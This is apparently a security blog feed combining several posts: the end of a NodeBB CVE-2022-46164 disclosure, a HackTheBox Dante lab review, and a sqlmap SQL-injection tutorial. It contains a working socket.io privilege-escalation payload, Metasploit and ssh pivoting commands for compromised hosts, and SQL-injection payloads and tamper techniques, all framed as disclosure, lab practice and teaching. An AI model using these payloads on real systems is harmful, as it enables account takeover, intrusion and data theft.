<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["constructor.assign",{"uid":1}]
</code></pre></div></div>
<p>You could send the following for the same result:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["groups.cover.constructor.assign",{"uid":1}]
</code></pre></div></div>
<p>The latest patch addresses this by modifying part of the <code class="language-plaintext highlighter-rouge">reduce</code> function that defines <code class="language-plaintext highlighter-rouge">methodToCall</code> as discussed above. The change is on line <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L126">126</a>.</p>
<p>It changes from this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (prev !== null && prev[cur]) {
</code></pre></div></div>
<p>To this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (prev !== null && prev[cur] && (!prev.hasOwnProperty || prev.hasOwnProperty(cur))) {
</code></pre></div></div>
<p>This essentially adds two more conditions before a child property is resolved, either of which must be met to continue. Both of these conditions relate to the <code class="language-plaintext highlighter-rouge">hasOwnProperty</code> method of the Object prototype. As defined in the
<a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/hasOwnProperty">Mozilla documentation</a>:</p>
<blockquote>
<p>The hasOwnProperty() method returns a boolean indicating whether the object has the specified property as its own property (as opposed to inheriting it).</p>
</blockquote>
<p>The first condition <code class="language-plaintext highlighter-rouge">!prev.hasOwnProperty</code> returns <code class="language-plaintext highlighter-rouge">true</code> if the <code class="language-plaintext highlighter-rouge">hasOwnProperty</code> method <strong>does not</strong> exist for the object. One case where this method would not exist is for null-prototype objects.</p>
<p>The second condition <code class="language-plaintext highlighter-rouge">prev.hasOwnProperty(cur)</code> returns <code class="language-plaintext highlighter-rouge">true</code> if the property belongs to the object itself instead of being inherited. So properties inherited from the parent prototype like <code class="language-plaintext highlighter-rouge">constructor</code> should return <code class="language-plaintext highlighter-rouge">false</code> if checked with this.</p>
<p>Let’s see how this works in the Node REPL. First we create two objects, one with the default prototype, and another with a null-prototype. Then we create child properties for each, with the name <code class="language-plaintext highlighter-rouge">mychild</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node
Welcome to Node.js v16.19.0.
Type ".help" for more information.
> Namespaces1 = {}
{}
> Namespaces2 = Object.create(null);
[Object: null prototype] {}
> Namespaces1.mychild = 1
1
> Namespaces2.mychild = 1
1
</code></pre></div></div>
<p>Now we attempt various uses of <code class="language-plaintext highlighter-rouge">hasOwnProperty</code> on each object to see the results.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> !Namespaces1.hasOwnProperty
false
> Namespaces1.hasOwnProperty('constructor')
false
> Namespaces1.hasOwnProperty('mychild')
true
> !Namespaces2.hasOwnProperty
true
> !Namespaces2.hasOwnProperty('constructor')
Uncaught TypeError: Namespaces2.hasOwnProperty is not a function
> !Namespaces2.hasOwnProperty('mychild')
Uncaught TypeError: Namespaces2.hasOwnProperty is not a function
>
</code></pre></div></div>
<p>We can see from this that methods/properties inherited from the object prototype will not be resolved once these additional conditions are applied.</p>Stephen BradshawDuring a recent security assessment, I found an account takeover vulnerability in NodeBB. I reported this to the NodeBB developers on 28 November 2022, who provided a patch within the hour. The vulnerability has CVE ID CVE-2022-46164, with a rating of 9.4: Critical. The security notification is here. Non-administrative NodeBB users can run admin functions and escalate privileges. In some configurations, anonymous users can do the same. The vulnerability affects all NodeBB releases prior to version 2.6.1 (updated: 2.8.1, see update below). If you are running NodeBB, you should update now.Hackthebox Dante Review2021-12-15T08:00:00+00:002021-12-15T08:00:00+00:00/2021/12/15/hackthebox_dante-review<p>A while ago at my work we got an Enterprise Professional lab subscription to HackTheBox. With this subscription, I had a chance to complete the Dante Pro lab a few months ago, so I thought I’d do a review of it here.</p>
<p align="center">
<img width="460" height="300" src="https://www.hackthebox.eu/images/press/dante/2.jpg" alt="Dante" />
</p>
<p>The Enterprise Pro lab subscription gives you dedicated access to one lab at a time, and seeing that Dante is the “Beginner” (lowest difficulty) lab in the Pro labs series, this was the first environment we had provisioned.</p>
<p>The description of Dante from HackTheBox is as follows:</p>
<blockquote>
<p>Dante Pro Lab is a captivating environment that features both Linux and Windows Operating Systems. You will level up your skills in information gathering and situational awareness, be able to exploit Windows and Linux buffer overflows, gain familiarity with the Metasploit Framework, and much more! Completion of this lab will demonstrate your skills in network penetration testing.</p>
<p>This Penetration Tester Level I lab will expose players to:</p>
<ul>
<li>Enumeration</li>
<li>Exploit Development</li>
<li>Lateral Movement</li>
<li>Privilege Escalation</li>
<li>Web Application Attacks</li>
</ul>
<p>14 Machines and 26 Flags! Take up the challenge and go get them all!</p>
</blockquote>
<p>This is a pretty accurate description of what’s involved, although there is certainly more stuff in some categories than there is in others. I had to do only one custom buffer overflow exploit each for Windows and Linux, but there was a whole heap of enumeration, privesc and web application exploits required, plus lateral movement to a sometimes ridiculous degree.</p>
<p>To a large extent Dante can be described as a collection of a whole lot of individual HackTheBox machines. If you have done some of the HackTheBox system challenges, you’ll be familiar with the pattern of exploiting a service or application to gain access as a regular user, grabbing a flag, privescing to root/admin, and then grabbing another flag. There is a lot of that in Dante.</p>
<p>There were definitely a lot fewer dependencies between machines in the Dante network than I expected. There are a few cases where you will need to gather some intel from another box to gain an initial foothold on certain systems you can access quite early on, and using owned boxes as pivots to reach restricted subnets is necessary. However, that was about it in terms of interconnectivity. Extensive dependencies between machines is a feature of the more difficult Pro labs in the series.</p>
<p>I also found that Dante had a number of challenges that were quite contrived and unrealistic. In fact, this almost turned me off the lab entirely in the beginning, because the worst aspects of this are seen early on. If you have spent a certain amount of time pentesting and red teaming, you start to get a feel for the types of decisions users, sysadmins and developers make when they use/manage/build systems. You can learn to anticipate the mistakes they are likely to make, and you select the techniques you will use accordingly, prioritising some and sometimes ignoring others entirely. This can wrong-foot you badly in Dante.</p>
<p>If you find yourself hitting a wall early on, and you have dismissed the use of certain techniques commonly taught to pentesting beginners because they don’t make sense in context, I’d suggest you try them anyway. If something is going wrong with some bit of loot you have found, don’t reject certain possible ideas for why that might be happening because “a real user wouldn’t do that”. Think of Dante more as a test of your ability to reproduce various pentesting techniques rather than a realistic network, and be prepared for system configurations and artefacts that would only exist as a result of a deliberate attempt to troll someone trying to exploit a system.</p>
<p>This is my one main gripe with Dante, but luckily it is mostly an issue early on in the lab, and once you’re past it (and are accounting for it in your approach) things are a lot more enjoyable.</p>
<p>From the opposite perspective, one thing I really <strong><em>liked</em></strong> about Dante is that it provides excellent experience for making you comfortable with operating through pivots. You start Dante by gaining access to a network environment where you can access one machine (that you need to first identify through scanning). You need to compromise this machine in order to proceed, and from there on, everything you do will be through <em>at least</em> one pivot.</p>
<figure>
<p align="center">
<img width="460" height="300" src="https://i.kym-cdn.com/photos/images/newsfeed/000/531/557/a88.jpg" alt="Pivots galore" />
<figcaption style="text-align: center">We need more pivots</figcaption>
</p>
</figure>
<p>I’ve heard of lots of different approaches that people use to deal with this. Some people swear by <a href="https://github.com/sshuttle/sshuttle">sshuttle</a>. My own approach was to use a combination of the following:</p>
<ul>
<li>Regular old ssh sessions, making use of a bunch of helpful ssh features</li>
<li>An <a href="https://github.com/oyyd/http-proxy-to-socks">http to socks proxy</a> to allow Burp to selectively route traffic both to the Dante network and to the Internet. Certain sites in Dante will load very poorly if you can’t access Internet-based resources loaded within some pages, and Burp’s regular SOCKS proxy option is all or nothing</li>
<li><a href="https://github.com/rofl0r/proxychains-ng">proxychains4</a> for enabling regular tools to work through the dynamic SOCKS proxies created by ssh</li>
<li>Meterpreter payloads on pivot hosts to use Metasploit’s routing capabilities</li>
</ul>
<p>For ssh I made sure to use keys for authentication - if a key wasn’t already in place for a user on a system, I would add my own key (one generated specifically for Dante). I would also set up an entry for the host in my ssh config file. This made it much more convenient to use ssh for various purposes, including enabling quick and easy transfers of files to and from the host. This also made it much easier to chain multiple ssh connections together via the <em>ProxyCommand</em> option.</p>
<p>An example entry might look something like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>host dante-host2
    Hostname 10.10.10.10
    ProxyCommand ssh dante-host1 -W %h:%p
    User root
    IdentityFile ~/.ssh/id_rsa_dante
    DynamicForward 1080
    Port 22
</code></pre></div></div>
<p>Hopefully most of this is pretty straightforward, but two lines might benefit from some explanation.</p>
<p>The <em>DynamicForward</em> option would open a SOCKS proxy on port 1080 on my local host. Traffic sent through this proxy would then be routed through the remote host. This is great for forwarding traffic from my host to the network locally attached to the remote ssh host. I would add one of these (with a unique port) to each ssh config entry I wanted to use as a routing point for other traffic.</p>
<p>I would use these to route traffic from Burp using the aforementioned http to socks proxy, but I would also have individual proxychains4 config files for each SOCKS proxy port. I would use these when running proxychains4 to route traffic to the appropriate networks, used like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proxychains4 -q -f proxychains_1080.conf <command> <options>
</code></pre></div></div>
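<p>The per-port config files themselves are short. A <code class="language-plaintext highlighter-rouge">proxychains_1080.conf</code> for the example above might look something like this (a sketch based on the proxychains-ng defaults):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 1080
</code></pre></div></div>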
<p>One tip for using proxychains: if you are running an interpreted program (like a Python script), it’s a good idea to explicitly reference the Python binary before that script, even if the script starts with a hash bang, e.g.:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proxychains4 -q -f proxychains_1080.conf python python_script.py
</code></pre></div></div>
<p>Without this specific reference to the script interpreter, sometimes the traffic generated from the script will fail to be routed through the proxy as you intended, and the network connection will fail.</p>
<p>The <em>ProxyCommand</em> option refers to another proxy config entry in the same file named “dante-host1”. This causes your ssh client to first open a connection to dante-host1, and to then tunnel the connection to dante-host2 through that session. So basically, this auto pivots you through dante-host1 to reach dante-host2. You can chain these entries together as well, and have a similar entry for dante-host3 with a <em>ProxyCommand</em> entry referring to dante-host2, which would then go through host1 and host2 to reach its final destination of host3. This is a massive convenience when you have to ssh into a host that requires multiple hops to be accessed.</p>
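<p>For example, a config entry for a hypothetical third host (the name and address here are invented for illustration) chaining through dante-host2 might look like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>host dante-host3
    Hostname 10.10.10.20
    ProxyCommand ssh dante-host2 -W %h:%p
    User root
    IdentityFile ~/.ssh/id_rsa_dante
    DynamicForward 1081
    Port 22
</code></pre></div></div>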
<p>I would occasionally also use local forwarding on an ad hoc basis, and when this was required I would use the ssh escape sequence (which by default is ~C) to access the ssh command line and create the forwards as needed. If you’re not familiar with the ssh escape sequence, when the appropriate key combination is pressed at the regular ssh command prompt as the next keypress after <em>Enter</em>, it drops you to a special prompt like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh>
</code></pre></div></div>
<p>At this prompt, you gain the ability to enable a number of ssh options without having to enable them from the command line when establishing a new session. You can, for example, create a local port forward from port 8888 to the remote host and port 172.16.1.1:8000 in the current session like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh> -L 8888:172.16.1.1:8000
</code></pre></div></div>
<p>Metasploit was another tool I used frequently throughout Dante, and using its routing options to pivot as needed was very helpful. With the appropriate routes in place you can use Metasploit from your host like it was directly connected to targets in other networks.</p>
<p>To use the routing you need to have a Meterpreter type payload on the host you want to use to pivot, and then modify the Metasploit routing table using the <em>route</em> command in the Metasploit console. As an example, if you want to route traffic to network 172.16.2.0/24 through the Meterpreter agent on session 2, you would run the route command as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>route add 172.16.2.0 255.255.255.0 2
</code></pre></div></div>
<p>If you follow my suggested method of using ssh with keys to connect to compromised hosts on the network, another nice trick you can try with Metasploit is to use the “auxiliary/scanner/ssh/ssh_login_pubkey” module to get a shell session on those hosts in Metasploit. As an example, to connect to host 10.10.10.10 as user root with key ~/.ssh/id_rsa_dante, do the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/ssh/ssh_login_pubkey
set USERNAME root
set RHOSTS 10.10.10.10
set KEY_PATH ~/.ssh/id_rsa_dante
exploit
</code></pre></div></div>
<p>Then, when you get your session opened, you can upgrade it to Meterpreter so you can do routing with it using the upgrade option. To upgrade session 1, you would run a command like the following, which would open the Meterpreter session to that host with the next available session number:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sessions -u 1
</code></pre></div></div>
<p>You can also use Metasploit’s SOCKS proxy module (auxiliary/server/socks_proxy) to forward traffic from external tools in a manner similar to the ssh proxying approach already mentioned. This also uses Metasploit’s inbuilt routing for traffic forwarding, so it allows you to direct other attack traffic via proxychains to any system that Metasploit can talk to. I didn’t use this too much in Dante, as there were ssh servers that could be used to route traffic where it was required. In cases where you have to chain through servers not running ssh however, this can be very useful. This approach does also have the advantage of allowing a single SOCKS port to direct traffic to multiple different network subnets - as long as Metasploit can talk to that segment via its routing through Meterpreter agents.</p>
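<p>Setting the module up looks something like the following (module option names may differ slightly between Metasploit versions):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1090
run -j
</code></pre></div></div>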
<p>Another tip I would give is to keep comprehensive notes. Using a hierarchical note-taking app, so you can keep categorised notes of your progress, is a great idea. Cherrytree is one option. I used Joplin during Dante, but it did start to grind a little once the pages got bigger, so I’m still looking for alternatives.</p>
<p>I had individual pages for each host, where I would keep information related to each host, and a few other pages to summarise various other bits of information about the network.</p>
<p>I took notes of:</p>
<ul>
<li>The flag values I collected, where I found them, and the name that the flag had in the HackTheBox Dante progress page</li>
<li>Credentials I found on any machine, to make it easier to try and reuse those credentials on other hosts</li>
<li>Each machine I discovered on each network segment. I had a summary page listing all hosts I had found so far and whether I had obtained root/system on each, and a page for each machine to take notes of things I tried in exploiting it, and how I eventually got access</li>
<li>A playbook for reestablishing access to systems, especially key tunneling hosts. If the lab gets reverted, or you need to get back into hosts you have already exploited to check if any critical information has been missed, this will be a big time saver. Using existing credentials or keys that will survive lab reversions is always the best option where available</li>
</ul>
<p>There are also a few other random tools and resources that proved very helpful during Dante. These include:</p>
<ul>
<li><a href="https://github.com/carlospolop/PEASS-ng">Peas</a> - A privilege escalation checker for Linux and Windows</li>
<li><a href="https://github.com/DominicBreuker/pspy">pspy</a> - A tool for snooping on process execution events on Linux with unprivileged users</li>
<li><a href="https://book.hacktricks.xyz/">hacktricks.xyz</a> - A wiki collecting a bunch of hacking techniques that I referred to a lot durung Dante</li>
</ul>
<p>I hope this review gave you a good idea of what the Dante pro lab is like, and some useful tips on how to operate in it. I did enjoy the experience of doing the lab, and am planning to do a few more HackTheBox Pro labs when time permits.</p>Stephen BradshawA while ago at my work we got an Enterprise Professional lab subscription to HackTheBox. With this subscription, I had a chance to complete the Dante Pro lab a few months ago, so I thought I’d do a review of it here.Moving to Jekyll2020-10-08T08:54:15+00:002020-10-08T08:54:15+00:00/2020/10/08/moving-to-jekyll<p>I finally decided to migrate the blog to a static site generated by Jekyll and hosted on GitHub pages. Now that I don’t have to fight Blogger to get a post written, and can just write markdown and upload it to GitHub, I may actually update this blog a little more frequently…</p>Stephen BradshawI finally decided to migrate the blog to a static site generated by Jekyll and hosted on GitHub pages. Now that I don’t have to fight Blogger to get a post written, and can just write markdown and upload it to GitHub, I may actually update this blog a little more frequently…Exploiting difficult SQL injection vulnerabilities using sqlmap: Part 12017-01-05T07:25:00+00:002017-01-05T07:25:00+00:00/2017/01/05/exploiting-difficult-sql-injection<h3>Introduction</h3><br/>A number of times when discovering "tricky" SQL Injection vulnerabilities during penetration tests, I have taken the approach of exploiting them by writing custom tools. This was usually after spending 5 minutes blindly poking at the vulnerability with sqlmap, and then stopping when it didn't immediately magic the answer for me.<br/><br/>OK, there have been a number of times where sqlmap has NOT been a suitable tool to use for various reasons, such as very particular filtering or data retrieval requirements, but there have also been a number of cases where I probably gave up on it too fast because I didn't properly understand how it worked or the extent of its capabilities. And this resulted in me taking much longer than necessary to exploit the vulnerability.<br/><br/>While writing custom tools can certainly be "fun" (for some definitions of "fun"), and while it provides some good coding practice and is an excellent way to ensure that you understand the injection flaw and its exploitation extremely well, it's also very time consuming. Writing your own injection tool often involves redoing a lot of work that has already been done by others - the digital equivalent of reinventing the wheel. You need to put together a capable HTTP sending/receiving framework, you need to parse HTML responses, you need to discover the (database specific) SQL commands that will allow you to retrieve data within the limitations imposed by the vulnerability, you need to be able to extract, group, infer, convert and/or join the retrieved data and you need to mentally map out the logic needed to tie all these parts together and turn it into working code with a usable interface.
It's a deceptively large amount of effort, especially when blind injection is involved, and I would consistently underestimate how long it would take to perform.<br/><br/>Given that sqlmap already has all this functionality, being in particular a very effective tool for retrieving data via all types of SQL injection vulnerabilities, I recently decided that it might be a good idea to spend some of my time to gain an improved understanding of the tool, so that in future I would be able to make more frequent use of it.<br/><br/>For my vulnerability test bed, I used some of the SQL injection labs from the <a href="https://www.pentesterlab.com/">Pentester Labs</a> website, namely the <a href="https://www.pentesterlab.com/exercises/web_for_pentester">Web for Pentester</a> and <a href="https://www.pentesterlab.com/exercises/web_for_pentester_II">Web for Pentester II</a> exercises, because those particular exercises are freely downloadable, easy to self-host and provide some great examples of SQLi vulnerabilities that require use of some of sqlmap's custom options for exploitation.<br/><br/>This will be the first in a series of posts where I share some of what I learned during this process. This first post will mainly seek to introduce and explain the relevant sqlmap options that I used and outline a process that can be used to get sqlmap to identify an SQL injection flaw that you have discovered through other testing activities. Future entries will provide examples of actually using this to exploit SQL injection vulnerabilities that sqlmap cannot easily detect on its own.<br/><br/><blockquote class="tr_bq"><b>Note</b>: While I will use their content as examples, the intent here is NOT to explain how to discover or do manual exploitation of the SQLi vulnerabilities in the PentesterLab exercises - because that has already been written up in the PentesterLab courseware available at their <a href="https://www.pentesterlab.com/">web site</a>. If you don't already know how to do manual discovery of SQLi vulnerabilities, you can check out their site, or any of the many other SQLi references on the Internet to learn this (for the record though, I think the PentesterLab stuff is a fantastic introduction to web application pentesting, and I wish I had access to it when I first started doing webapp testing).</blockquote><br/><h3>Useful sqlmap options</h3><br/>Before I jump into working through specific examples, I wanted to describe the purpose of some sqlmap options. More advanced use of sqlmap, in terms of actually tweaking its operation in order to make a difficult injection operate, will require that you actually understand how these options work. In essence, this is the README I wish I had received when I moved beyond the bare basics in my use of the tool, as I definitely would have used sqlmap much more extensively had I understood these particular options as well as I do now. Hopefully you can now benefit from my having learned this the "hard" way, i.e. via trial and error.<br/><br/><h4><span style="font-size: large;">Prefix and suffix</span></h4><br/>The prefix (--prefix) and suffix (--suffix) options configure the strings that should be included with each SQL injection payload in order to begin, and then terminate, the injection. So what does this mean exactly?<br/><br/>Take this simple example of an injectable query:<br/><br/><pre class="code">$query = "SELECT first_name, last_name FROM users WHERE name = '" . $_GET["username"] . 
"'";</pre><br/><br/>Whats an example of an injection string that would work here? Something like the following would work as a simple POC of a union injection.<br/><br/><pre class="code">' UNION SELECT NULL,NULL -- a</pre><br/><br/>This closes the single quoted string before our injection point with a single quote ('), seperates the next statement with a space ( ), adds our injection query of a UNION SELECT with a column count matching that of the existing SELECT query, and then comments out the remainder of the original query to ensure syntactical correctness. The prefix in this case is the single quote and space (' ) used before the UNION SELECT, and the suffix is the characters (a space, two dashes, another space and the letter "a") used to comment out the remainder of the original query ( -- a).<br/><br/>The following options can be used to configure sqlmap to use this prefix and suffix:<br/><br/><pre class="code"> --prefix="' " --suffix=' -- a'</pre><br/><br/>Now, these particular examples of prefixes and suffixes (or ones that are functionality identical) are ones that sqlmap will be able to figure out itself, so you will rarely need to specify values like this. However, this hopefully does help you in understanding what these options do, because they are quite important ones to grasp if you want to use sqlmap for more difficult injections. In fact, I put these options first in the list of ones I wanted to describe because as I was working through this process of learning how to make sqlmap identify certain injection vulnerabilities, these were the ones that I used the most. Also, finally learning what these did was an "AHA!" moment for me, as I have been aware of the options existence for an embarassingly long time without understanding what they did.<br/><br/><blockquote class="tr_bq"><b>Note</b>: Why use NULL values in the UNION SELECT? NULL is a great value to use in UNIONS when trying to determine the correct number of columns in an injection, as it can sit in place of a number of different field types, such as numbers, strings and dates.</blockquote><blockquote class="tr_bq"><b>Note2</b>: Why the extra space and the "a" character after the comment? Sometimes, inserted comments at the end of an injection are not properly recognised by the database unless there is a whitespace character to follow. Since whitespace characters on their own are sometimes not easily identifiable when displayed on screen (depending on what other text follows) its helpful to include other text afterwards so you can easily see there is something following the comment. You will see sqlmap do this when you look at some of the injection strings it uses.</blockquote><br/><h4><span style="font-size: large;">Specifying Injection technique and tests</span></h4><br/>There are a number of different SQL injection techniques available for use in sqlmap, which are configured via the --technique option, and sqlmap comes with a number of different in built tests for exploiting vulnerabilities using those techniques. By default, sqlmap will enable all possible techniques when trying to identify an injection vulnerability, and will run all associated tests that meet the configured risk and level settings (discussed later).<br/><br/>If you have manually discovered a SQL injection flaw in a website and want to use sqlmap to exploit the vulnerability, you may already know the correct technique, as well as the most appropriate payload configuration to use, and this is where specifying these options manually can be useful. 
Manual specification of these settings helps prevent less effective techniques from being chosen by sqlmap, and cuts down on the amount of traffic sent by sqlmap during its detection period.<br/><br/>A brief listing of the injection techniques available for use by sqlmap is provided below in order of preference. You can select the appropriate ones by using the --technique switch followed by a listing of the letters associated with the method/s you wish to use. The default is all options (e.g. "--technique=BEUSTQ"). The descriptions provided below are only intended as high level reminders of each technique.<br/><ul><li><b>Stacked queries (S)</b> - This involves stacking whole new SQL queries onto the end of the existing injectable query. It's the preferred method to use if available, because there are a number of exploitation actions that won't be available to you using any other method, however the use of this method does require support from the database and API. You may not necessarily be able to see the results of your stacked query in the page response, so when actually retrieving data (as opposed to performing other operations such as INSERTS) you may want to use another technique such as Unions.</li><li><b>Union query based (U)</b> - This involves retrieving data by joining a second select statement to the original, via the UNION SELECT statement. You need to be able to see the results from the original SELECT query (and hence your UNION) in the page response for this method to be usable.</li><li><b>Error based (E)</b> - This technique retrieves data by manipulating database error messages to directly display that data. To use this method, you need to be able to see database error messages in page responses.</li><li><b>Inline queries (I)</b> - This technique uses inline database queries to retrieve data - essentially a query embedded within another query like this "SELECT (SELECT password from user) from product". I have not personally had the occasion to use this option in sqlmap, and while inline queries can be used more widely than this in manual injection scenarios, it appears that you need to be able to see the inline query's result in the page response for this to be usable through sqlmap.</li><li><b>Boolean blind (B)</b> - This retrieves data from the database by asking a series of True/False style questions in your injections, and determining the result (True or False) based on identifiable changes in the response. To use this option, you need to be able to trigger some sort of identifiable state change in HTTP response content from logically different, but syntactically correct database queries (e.g. a different page response only resulting from an invalid database query doesn't count here). This technique will require more requests and time to perform than those previously listed, as the data must be retrieved indirectly via boolean inference.</li><li><b>Time based blind (T)</b> - This technique is similar to boolean blind, in that it retrieves data via posing a number of True/False style questions to the database, however instead of determining the answers to these questions via the content of a response, it is done using the amount of time a response takes. This is done through associating deliberate delays with particular answers via database statements that consume a noticeable amount of time, like sleep. This is the most time consuming method of data retrieval, and is sensitive to errors introduced by network load.
<br/><br/>Selecting a particular technique, or set of techniques, will limit the payloads that sqlmap uses to those associated with the chosen technique/s. It is also possible to further filter the attempted payloads via the --test-filter and --test-skip options, to target payloads that contain (or do not contain) particular text within their name.<br/><br/>If, for example, you know your target SQLi vulnerability exists within the 'ORDER BY' clause of a query, why not filter for only these test payloads by using:<br/><br/><pre class="code">--test-filter='ORDER BY'</pre><br/><br/>In addition, if you write your own custom test payload for an injection, you can use only that particular payload by setting a filter for a unique string you have added to its name.<br/><br/><b>Note</b>: To have the best chance of configuring sqlmap to detect and exploit a given difficult vulnerability, it's important that you properly understand the type of injection you wish to use and the requirements for its exploitation. This is because, for injection vulnerabilities that sqlmap cannot find on its own, you have to be able to create an effective POC exploit manually to use as a basis for correctly setting sqlmap's configuration. Hopefully this brief summary of the available injection types is clear and detailed enough to serve as a refresher, but if you are unclear on these techniques you may wish to do further research on any you are unfamiliar with before continuing.<br/><br/><br/><h4><span style="font-size: large;">Risks and levels</span></h4><br/>The risk and level settings in sqlmap control which test payloads will be attempted during the detection run used to identify an SQLi vulnerability. Each test payload has a configured level and risk setting, and if the configured threshold is not met for that payload during a particular run of the tool, that payload will not be used.<br/><br/>Risk in sqlmap refers to the risk of failure, potential database damage or errors in data retrieval associated with using a given payload. Available risk settings range from 1 to 3, with 1 (the lowest level) being the default.<br/><br/>Level refers to the number of requests required to use the associated payload for exploitation. Available level settings range from 1 to 5, with 1 again the default.<br/><br/>A common recommendation given in various usage guides is to increase the risk and level settings if sqlmap does not identify a vulnerability in its default configuration, however in my experience, for trickier injection vulnerabilities this change alone is often not sufficient.
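<br/><br/>For reference, raising both settings to their maximum values looks like the following (URL hypothetical). Be warned that this greatly increases the number of requests sent, and that higher risk payloads can potentially modify data on the target:<br/><br/><pre class="code">sqlmap -u 'http://testsite.local/users.php?username=bob' --level=5 --risk=3</pre>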
<br/><br/><br/><h4><span style="font-size: large;">Detection options</span></h4><br/>Using the boolean blind injection technique will often require that you tell sqlmap what to look for in the HTTP response content in order to distinguish a True condition from a False. There are a number of options in sqlmap that allow you to configure this behavior, such as --string and --not-string (strings that should appear in True and False responses respectively), --regexp (a regular expression that, when matched, indicates the True condition), --code (a HTTP status code that indicates True), --text-only (compare responses based on text content only) and --titles (compare responses based on page title).<br/><br/>A neat thing you can do with the --string and --not-string settings is to use Python hexadecimal backslash quoting to do multi-line matching. Here is an example showing how to match a section of HTML that includes newlines (\x0a) and tabs (\x09).<br/><br/><pre class="code">--string='Name\x0a\x09\x09Stephen'</pre><br/>When your detection needs are more complex than what can be satisfied by the above options, there is another sqlmap feature that, with a little imagination, you can abuse in order to perform more complex comparative logic, which leads us to...<br/><h4><br/><span style="font-size: large;">Second order injection</span></h4><br/>sqlmap contains a --second-order option, which is intended to enable exploitation of second order SQL injection vulnerabilities, where the results of an SQL injection need to be retrieved from a different URL than the one used to actually perform the injection. The option allows you to provide a single URL which will be requested by sqlmap after each injection payload is sent, and then parsed as per normal configured sqlmap behavior.<br/><br/>By setting the --second-order option to point to your own locally run custom forwarding and parsing server, you can make use of this option to return arbitrary content to sqlmap, perhaps based on data you have automatically retrieved from the target site. This capability can be used to do things such as retrieve data from a dynamically changing second order URL at the target site, or to retrieve content from the remote site and perform complex parsing or logic checks on it, passing through to sqlmap something that it can process using its inbuilt functionality.<br/><br/><a href="https://github.com/stephenbradshaw/pentesting_stuff/blob/master/helper_servers/sqlmap_secondorder_helper_server.py">This link</a> contains a modifiable second-order forwarding server that I wrote in Python to work with sqlmap, which can be run locally from the command line. It starts its own HTTP server on the loopback address, and when it receives a request from sqlmap it can request data from another website, then return the (optionally) parsed data back to sqlmap. It is based on Python classes that I wrote specifically to facilitate reuse and modification, so if you can write simple Python you can change it to do any parsing or fetching job you wish.<br/><br/><br/><h4><span style="font-size: large;">Tamper scripts</span></h4><br/>Tamper scripts in sqlmap allow you to make programmatic changes to all the request payloads sent by sqlmap, in order to facilitate the bypass of web application firewalls and other filters. If you are dealing with filters that prohibit, for example, all whitespace within an injection string, there is a tamper script that can help (--tamper=space2comment).
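<br/><br/>If none of the bundled scripts do what you need, writing your own is an option. The following is a minimal sketch of what a custom tamper script looks like, mimicking the basic space-to-inline-comment behaviour of space2comment - it would be saved as a .py file in sqlmap's tamper directory and referenced by name with --tamper (treat the exact layout as an approximation and compare against a bundled script before relying on it):<br/><br/><pre class="code"># my_space2comment.py - minimal custom tamper script sketch<br/>from lib.core.enums import PRIORITY<br/><br/>__priority__ = PRIORITY.NORMAL<br/><br/>def dependencies():<br/>    # some scripts use this hook to warn about DBMS specific behaviour; nothing needed here<br/>    pass<br/><br/>def tamper(payload, **kwargs):<br/>    # swap each space for an inline comment to get past whitespace filters<br/>    return payload.replace(" ", "/**/") if payload else payload<br/></pre>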
<br/><br/>A reasonably up to date listing of available tamper scripts and their purpose is available <a href="http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html">here</a>.<br/><br/><br/><h4><span style="font-size: large;">Custom written test payloads</span></h4><br/>sqlmap comes configured with a large number of test payloads that it can use to perform injections. These are defined within XML files named after the associated injection technique, stored in xml/payloads under the sqlmap root path. You can add your own payloads to these files by copying the XML nodes of an existing test (one that's similar to the one you want to create) and modifying it as required. There is an example of doing this <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Sqlmap-Tricks-for-Advanced-SQL-Injection/">here</a>, and a specific example of how to use custom test payloads to exploit a boolean blind issue inside the ORDER BY clause will be provided in a future post.
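<br/><br/>To give you a rough idea of the format before then, the following is an abridged sketch of what a single test definition in one of these files looks like, based on my recollection of the entries in boolean_blind.xml - copy a real entry from the relevant file to get the complete and current set of nodes and placeholder values before using this:<br/><br/><pre class="code"><test><br/>    <title>AND boolean-based blind - WHERE or HAVING clause (custom)</title><br/>    <stype>1</stype>    <!-- injection technique: 1 = boolean blind --><br/>    <level>1</level><br/>    <risk>1</risk><br/>    <clause>1</clause>  <!-- which query clause the payload applies to --><br/>    <where>1</where>    <!-- how the payload is combined with the parameter value --><br/>    <vector>AND [INFERENCE]</vector><br/>    <request><br/>        <payload>AND [RANDNUM]=[RANDNUM]</payload><br/>    </request><br/>    <response><br/>        <comparison>AND [RANDNUM]=[RANDNUM1]</comparison><br/>    </response><br/></test><br/></pre>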
